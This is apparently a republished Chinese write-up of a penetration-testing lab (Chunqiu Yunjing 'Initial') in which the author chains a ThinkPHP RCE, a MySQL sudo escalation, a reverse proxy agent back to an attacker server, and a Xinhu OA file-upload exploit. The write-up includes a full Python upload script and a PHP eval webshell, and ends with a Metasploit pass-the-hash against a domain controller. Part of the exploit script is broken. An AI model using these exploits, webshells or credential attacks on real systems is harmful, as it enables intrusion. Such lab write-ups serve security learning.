文章总结: 文档记录了一次完整的渗透测试实战过程,从外网扫描靶机发现开放端口,利用PHP框架漏洞获取Webshell,通过MySQL提权拿到flag1;搭建内网代理后进行横向移动,利用信呼协同办公系统弱口令和文件上传漏洞获得flag2;最后通过MS17-010漏洞攻破域控DC01取得flag3。全过程涵盖漏洞扫描、权限提升、内网渗透等关键技术环节。 综合评分: 84 文章分类: 渗透测试,红队,内网渗透,漏洞分析,实战经验
春秋云镜Initial
原创
my my
云晞科技Sec
2026年4月18日 20:02 湖北
在小说阅读器读本章
去阅读
Initial
春秋云镜靶机地址:https://yunjing.ichunqiu.com
靶机地址:39.98.109.150
先fcan扫描
发现开放了3个端口,和一个poc漏洞优先访问80
是个网页登录界面,暂时没发现有用的,那么就直接利用php框架扫描的漏洞工具来扫一下
这里有点事,重新开了个环境:39.99.227.109
到https://gtfobins.org/上找mysql的sudo提权方法
提取后直接查看root目录下,拿到flag1
flag1
flag{60b53231-
搭建内网代理,在有权限(/tmp)的目录下上传 linux_x64_agent 和 fscan
给文件执行权限
chmod +x /tmp/linux_x64_agent
打开服务端(要有公网ip的服务器)
将linux_64_admin 上传到服务器,并执行 文件监听端口
./linux_x64_admin -l 6666
被控端(靶机)执行脚本输入:
./linux_x64_agent -c 服务器(公网)ip:6666
服务器端已经反弹过来了,开始扫描内网
开启proxifier或者其他代理软件
也是可以访问到这个网页了
flag2
尝试了下常用的弱口令直接进去了 账户:admin 密码:admin123
网上直接搜到了一篇这个系统的rce漏洞
登录后就是 web 手的事情了,这个系统存在文件上传漏洞,有直接的 poc
import requests
import sys
def main():
target = "http://172.22.1.18"
shell_file = "1.php"
session = requests.Session()
login_url = f"{target}/?a=check&m=login&d=&ajaxbool=true&rnd=533953"
login_data = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}
try:
print("[*] 正在登录...")
r = session.post(login_url, data=login_data, timeout=10)
r.raise_for_status()
except requests.exceptions.RequestException as e:
print(f"[-] 登录失败: {e}")
return
upload_url = f"{target}/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913"
try:
print(f"[*] 正在上传 {shell_file}...")
with open(shell_file, 'rb') as f:
files = {'file': f}
r = session.post(upload_url, files=files, timeout=10)
r.raise_for_status()
upload_result = r.json()
filepath = "/" + upload_result['filepath'].split('.uptemp')[0] + '.php'
fileid = upload_result['id']
print(f"[+] 上传成功! 文件ID: {fileid}, 路径: {filepath}")
return
task_url = f"{target}/task.php?m=qcloudCos|runt&a=run&fileid={fileid}"
shell_url = f"{target}{filepath}"
try:
print(f"[*] 正在测试Shell: {shell_url}")
r = session.get(shell_url, params={'1': "system('dir');"}, timeout=10)
print("n" + "="*50)
print(r.text)
print("="*50 + "n")
print("[+] 交互完成! 可手动访问Shell地址继续操作")
except requests.exceptions.RequestException as e:
print(f"[-] Shell连接失败: {e}")
if __name__ == "__main__":
main()
相同目录下还有一个 1.php 文件存的是一句话木马
<?php @eval($_POST["shell"]);?>
手动访问一下上传的php,让服务器解析一下,然后webshell连接
是system权限的用户,直接拿flag
拿到第二段flag: 2ce3-4813-87d4-
❝
172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1 flag1 拿下 172.22.1.2 DC:DC01.xiaorang.lab 172.22.1.18 信呼协同办公系统 flag2 拿下 172.22.1.21 MS17-010
flag3
接下来尝试拿flag3,直接msfconsole windows 下载地址:https://windows.metasploit.com/
use exploit/windows/smb/psexec
set RHOSTS 172.22.1.2
# 设置SMB认证使用的用户名
set SMBUser Administrator
#设置SMB认证的凭证,这里使用哈希传递攻击的标准格式:[LM哈希]:[NTLM哈希]
# 前半段 aad3b435b51404eeaad3b435b51404ee 是现代Windows系统默认的无效/空LM哈希固定占位符
# 后半段 10cf89a850fb1cdbe6bb432b859164c8 是目标管理员账户的NTLM哈希,无需明文密码即可完成认证
set SMBPass aad3b435b51404eeaad3b435b51404ee:10cf89a850fb1cdbe6bb432b859164c8
# 设置目标主机所属的Windows域名称,指定本次认证的域环境为xiaorang.lab
set SMBDomain xiaorang.lab
set PAYLOAD windows/x64/meterpreter/bind_tcp
exploit
拿到完整flag
flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:云晞科技Sec my my《春秋云镜Initial》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论